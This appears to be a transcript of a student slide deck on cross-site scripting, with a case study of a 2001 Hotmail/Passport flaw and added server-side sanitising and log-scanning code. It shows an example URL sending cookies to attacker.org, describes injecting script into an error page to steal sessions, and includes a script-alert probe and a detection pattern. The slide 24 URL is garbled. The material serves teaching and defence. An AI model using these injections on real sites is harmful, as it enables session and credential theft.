Cross Site Scripting XSS - PowerPoint PPT Presentation
1
Cross Site Scripting (XSS)
  • Presented by Team SSL
  • Sam Jeyandran
  • Shain Bergman
  • Liz Neiderman

2
Learning objectives
  • Understand the definition of a cross-site
    scripting vulnerability
  • Know how they happen and why they are so hard to
    prevent
  • Get a hands-on perspective about cross-site
    scripting.
  • Learn some ways to prevent them

3
Cross-Site Scripting Outline
  • Survey of client-side scripting technologies
  • Definition
  • Risks
  • Types of XSS
  • Without storage
  • With storage
  • Case Study

4
What is Cross Site Scripting (XSS)
  • Cross site scripting (XSS) is a type of computer
    security exploit where information from one
    context, where it is not trusted, can be inserted
    into another context, where it is. From the
    trusted context, an attack can be launched.

5
Cross Site Scripting by Types
  • Non-persistent XSS: the malicious code is embedded
    in the page that is echoed immediately following
    the request.
  • Reflected
  • Persistent: the malicious code is stored on the
    server for a later time.
  • DOM Based XSS
  • Klein 2005

6
Key Term
  • HTML: hypertext markup language. HTML is parsed
    by your web browser after a web page is retrieved
    and consists of tags.

7
Non-Persistent / Reflected XSS
  • How significant is this?
  • Victim has to click on link only AFTER logging
    into the website.
  • The remote site can detect infected input.

8
What are the Threats
  • Software failure/error
  • Web application
  • Browser failures
  • Deliberate acts of espionage/trespass
  • unauthorized access, data collection

9
Examples of XSS attack
  • Web browsing attack
  • e-commerce websites
  • Software that uses browser rendering
  • E-mails
  • JavaScript
  • document.open(XSS vulnerable)

 
10
Reflected XSS
[Diagram, recovered from the slide labels only: the attacker sends the victim
user an email ("From Malicious User To Victim User: CLICK HERE") whose link
points at the target site but carries malicious code; the victim's browser
window opens the target site, the code is reflected back and runs in the
security context of vulnerablesite.com, alongside the normal valid session.
Illustrative URL from the slide:
http://www.google.com/document.open(http://www.attacker.org/page.htm?document.cookie)
Labels: target site, attacker, malicious code, normal interaction, reflected
code, email client, browser window 1, browser window 2.]
11
Stored XSS
  • You think that you interact with site Z
  • Site Z has been poisoned by attacker (Samy)
  • The "poison" (e.g., JavaScript) is sent to you,
    along with legitimate content, and executes. It
    can exploit browser vulnerabilities, or contact
    site S and steal your cookies, usernames and
    passwords...

[Diagram, recovered from the slide labels only: attacker Samy sends the
"poison" to site Z; while you are surfing Z, the poison is delivered to you
and the hostile code executes, contacting site S. Modified from Korbin, 2005]
12
Mitigation: Validation
  • Validation of input
  • Use of regular expressions
  • Algorithms
  • < and > signify HTML codes (tags)
  • Encode them as &lt; and &gt;

13
XSS Mitigation Techniques
  • Blacklisting: remove from user input all
    characters that are meaningful in scripting
    languages
  • e.g. < > " ' ( )
  • You must do this filtering on the server side
  • You cannot do this filtering using JavaScript on
    the client, because the attacker can get around
    such filtering
  • Whitelisting: define characters that are OK
    (alpha and numeric), and filter everything else
    out. -- your best bet
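Slides 12 and 13 describe three approaches (encoding < and >, blacklisting, whitelisting) without showing code. The following is an added example, not from the slides or any project they mention, that implements all three for a server-side error-message page and contrasts a vulnerable rendering with a hardened one. The function names, the default message and the exact whitelist are assumptions made for the demo; the code is meant to run on the server (Node.js), never as client-side JavaScript.

```javascript
// Added example (not from the slides): server-side handling of an error
// message that will be reflected into HTML, contrasting encoding,
// blacklisting and whitelisting. Assumed to run on the server (Node.js).

// Output encoding: turn every character that has meaning in HTML into its
// entity (the slides' &lt; and &gt;, plus &, " and ' for attribute contexts).
function encodeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Blacklisting: strip a fixed set of "scripting" characters. Anything the
// list forgets passes straight through, which is why the slides prefer
// whitelisting. This list deliberately omits < and > to show the gap.
const BLACKLIST = /["'()]/g;
function blacklistFilter(text) {
  return String(text).replace(BLACKLIST, '');
}

// Whitelisting: accept only letters, digits, spaces and a little
// punctuation; reject (rather than repair) anything else.
const WHITELIST = /^[A-Za-z0-9 .,!?-]*$/;
function isWhitelisted(text) {
  return WHITELIST.test(String(text));
}

// Vulnerable rendering: the user-controlled message is concatenated into
// the page unchanged, so any tag inside it becomes part of the document.
function renderErrorUnsafe(errMsg) {
  return `<html><body><p>${errMsg}</p></body></html>`;
}

// Hardened rendering: validate with the whitelist and fall back to a fixed
// message (assumed default); then encode on output anyway, as defence in
// depth against a whitelist that is later loosened.
const DEFAULT_MSG = 'User is not authenticated';
function renderErrorSafe(errMsg) {
  const msg = isWhitelisted(errMsg) ? errMsg : DEFAULT_MSG;
  return `<html><body><p>${encodeHtml(msg)}</p></body></html>`;
}

// Side-by-side view of both renderings for one input.
function compare(errMsg) {
  return { unsafe: renderErrorUnsafe(errMsg), safe: renderErrorSafe(errMsg) };
}
```

Calling `compare('<b>This should be bold</b>')` returns the vulnerable page with the tag intact and the hardened page carrying only the default message; calling it with `'Bad password!'` returns the same text in both, since the whitelist admits it and the encoder has nothing to change.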

14
What are the Threats
  • Software failure/error
  • Web application
  • Browser failures
  • Deliberate acts of espionage/trespass
  • unauthorized access, data collection

15
XSS Risks
  • Stealing of services and account credentials
  • Un-trusted information from a trusted site
  • Denial of service
  • Exploitation of web browser

16
XSS Risks- Stolen Credentials
  • Credentials could be stolen and used by the
    attacker
  • A web site that requires authentication needs a
    technology solution (passwords)
  • Cookies are used to store credentials

17
XSS Risks - Misinformation
  • Scripts can spy on what you do
  • History of sites visited
  • Track information you posted to a web site
  • Scripts can misinform
  • Modify the web page
  • Modify the content

18
XSS Risk - DoS
  • Malicious scripts can make your web site
    inaccessible
  • Make browsers crash or become inoperable
  • Redirect browsers to other web sites

19
Case Study: Microsoft Passport
  • Information found on
  • http://eyeonsecurity.net/
  • The exploit explained is from 2001. We are only
    using it as an example of XSS; Microsoft has
    since dealt with this vulnerability.

20
A single name, password and wallet for the web
  • The attack on Microsoft Passport is particularly
    dangerous to users because the same
    authentication method allows you to access many
    different programs.
  • This is an example of security vs. access. One
    authentication method is nice, but it comes with
    the cost of security issues.

21
Cross Site Scripting on Hotmail: How it should
work
  • When a user clicks on a non-trusted link, the
    credentials should not be sent to the non-trusted
    website.
  • However, when a user goes to an MSN site from a
    non-trusted email the credentials get sent to the
    Passport site. This is where exploits have been
    achieved.

22
How this is done
  • This exploit is an example of a JavaScript
    attack.
  • It is performed through a vulnerability in a
    flawed ASP script on an MS Passport site,
    ErrorMsg.asp. This allows different scripts to
    display error messages in HTML. The problem is
    that a cracker can insert his own script.

23
Implementation
  • ErrMsg will usually be filled in with something
    like "User is not authenticated". Now what if it
    is filled with <b>This should be bold</b>, HTML
    tags included?
  • http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg=<b>This%20should%20be%20bold</b>
  • If no filtering is done for JavaScript, we can
    very easily inject our own JavaScript code to
    retrieve the session cookie stored in the Hotmail
    user's browser.

24
Implementation (continued)
  • Without any filtering we would just pass the
    following URL and expect a message box to appear
    with the MSN cookies
  • http://auctions.msn.com/Scripts/ErrorMsg.asp?SourceOErrMsgookie)'
  • To complete the exploit the malicious user has to
    send a URL which actually passes the cookie to a
    third-party CGI script instead of displaying it
    to the Hotmail user in a message box. The
    exploiting e-mail page could look very similar to
    the one below.
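Slides 23 and 24 describe the ErrorMsg.asp flaw from the attacker's side; what a defender wants alongside it is how to keep a session cookie out of reach of injected script, and how such requests show up in server logs. The following is an added example, not from the slides or the eyeonsecurity advisory: it builds an HttpOnly session cookie header (so document.cookie cannot read it) and scans constructed web-server access-log lines for an ErrMsg parameter carrying markup. The cookie name, the Common Log Format layout, the sample addresses and the watched parameter list are assumptions for the demo.

```javascript
// Added example (not from the slides or the advisory): two defender-side
// measures for the ErrorMsg.asp case study.
// (1) Mark the session cookie HttpOnly so script running in the page cannot
//     read it through document.cookie.
// (2) Flag access-log requests whose ErrMsg parameter contains markup, the
//     signature of a reflected-XSS probe against this page.

// Build a Set-Cookie header value for the session cookie. HttpOnly is the
// point here; Secure and SameSite are additional hardening (assumed).
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Decode a query string into a key/value map, tolerating '+' for space and
// malformed percent-escapes (kept raw rather than throwing).
function parseQuery(qs) {
  const out = {};
  for (const pair of qs.split('&')) {
    if (!pair) continue;
    const i = pair.indexOf('=');
    const k = i < 0 ? pair : pair.slice(0, i);
    const v = i < 0 ? '' : pair.slice(i + 1);
    try {
      out[decodeURIComponent(k)] = decodeURIComponent(v.replace(/\+/g, ' '));
    } catch {
      out[k] = v;
    }
  }
  return out;
}

// A request is suspicious when a watched parameter, after URL decoding,
// contains an HTML tag or a javascript: URL.
const WATCHED_PARAMS = ['ErrMsg'];            // assumed: parameters reflected into HTML
const MARKUP = /<\s*\/?\s*[a-z]|javascript\s*:/i;
function isSuspicious(requestPath) {
  const qmark = requestPath.indexOf('?');
  if (qmark < 0) return false;
  const params = parseQuery(requestPath.slice(qmark + 1));
  return WATCHED_PARAMS.some((p) => p in params && MARKUP.test(params[p]));
}

// Pull the request target out of a Common Log Format line and flag it.
// Returns the list of flagged request paths.
const CLF_REQUEST = /"(?:GET|POST) (\S+) HTTP\/[\d.]+"/;
function scanAccessLog(lines) {
  const flagged = [];
  for (const line of lines) {
    const m = CLF_REQUEST.exec(line);
    if (m && isSuspicious(m[1])) flagged.push(m[1]);
  }
  return flagged;
}

// Constructed sample log lines (not real traffic): a normal error page, the
// bold-tag test from slide 23, a cookie-alert probe, and an unrelated hit.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2001:10:00:00 +0000] "GET /Scripts/ErrorMsg.asp?Source=O&ErrMsg=User%20is%20not%20authenticated HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2001:10:00:01 +0000] "GET /Scripts/ErrorMsg.asp?Source=O&ErrMsg=%3Cb%3EThis%20should%20be%20bold%3C/b%3E HTTP/1.1" 200 530',
  '10.0.0.9 - - [01/Jan/2001:10:00:02 +0000] "GET /Scripts/ErrorMsg.asp?Source=O&ErrMsg=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 560',
  '10.0.0.7 - - [01/Jan/2001:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024',
];
```

`scanAccessLog(SAMPLE_LOG)` returns the two ErrorMsg.asp requests whose ErrMsg contains a tag and ignores the legitimate "User is not authenticated" request. The HttpOnly flag does not stop the script from being injected; it limits what injected script can read, which is why it belongs beside output encoding rather than in place of it.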

25
[Slide 25: image only (the example exploiting e-mail page); no transcript
available]
26
Summary
  • Security officials should be aware of this
    exploit because XSS is a large threat to an
    organization.
  • Despite being a new exploit, there are some tools
    out to detect XSS, like Acunetix Web Vulnerability
    Scanner

27
Thank You!
  • Any Questions or Comments